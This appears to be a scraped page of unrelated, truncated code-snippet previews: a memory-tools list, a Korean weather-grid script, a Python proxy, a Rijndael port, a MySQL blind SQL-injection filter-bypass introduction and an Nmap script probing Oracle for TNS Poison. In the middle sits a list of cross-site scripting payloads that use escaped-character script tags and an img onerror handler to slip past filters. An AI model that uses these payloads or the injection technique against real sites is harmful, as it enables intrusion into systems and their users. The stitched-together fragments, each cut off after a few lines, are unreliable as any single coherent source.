Required tools for playing around with memory:
hexdump
objdump
readelf
xxd
gcore
// 소스출처 : http://www.kma.go.kr/weather/forecast/digital_forecast.jsp 내부에 있음 | |
// 기상청에서 이걸 왜 공식적으로 공개하지 않을까? | |
// | |
// (사용 예) | |
// var rs = dfs_xy_conv("toLL","60","127"); | |
// console.log(rs.lat, rs.lng); | |
// | |
<script language="javascript"> | |
//<!-- |
#!/usr/bin/python | |
# This is a simple port-forward / proxy, written using only the default python | |
# library. If you want to make a suggestion or fix something you can contact-me | |
# at voorloop_at_gmail.com | |
# Distributed over IDC(I Don't Care) license | |
# http://voorloopnul.com/blog/a-python-proxy-in-less-than-100-lines-of-code/ | |
import socket | |
import select | |
import time | |
import sys |
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
<img src=1 href=1 onerror="javascript:alert(1)"></img> |
############################################################################# | |
# Original code ported from the Java reference code by Bram Cohen, April 2001, | |
# with the following statement: | |
# | |
# this code is public domain, unless someone makes | |
# an intellectual property claim against the reference | |
# code, in which case it can be made public domain by | |
# deleting all the comments and renaming all the variables | |
# | |
class Rijndael(object): |
There are several ways to bypass blind SQLi filters,
and today I will introduce MySQL blind sqli payload using an insert()
function.
Interestingly, the payload itself is limited to MySQL, but the technical side of this attack should be still valid in most SQL.
This attack is useful when typical substring filters (i.e. left(), right(), mid(), substr(), regexp(), strcmp(), concat() ... LIKE ...
) are blocked by the script.
local bin = require "bin" | |
local io = require "io" | |
local nmap = require "nmap" | |
local shortport = require "shortport" | |
local stdnse = require "stdnse" | |
local table = require "table" | |
description = [[ | |
Simple module to test Oracle DB server for TNS Poison vulnerability. | |
Module sends to server a packet with command to register new TNS Listener and check response |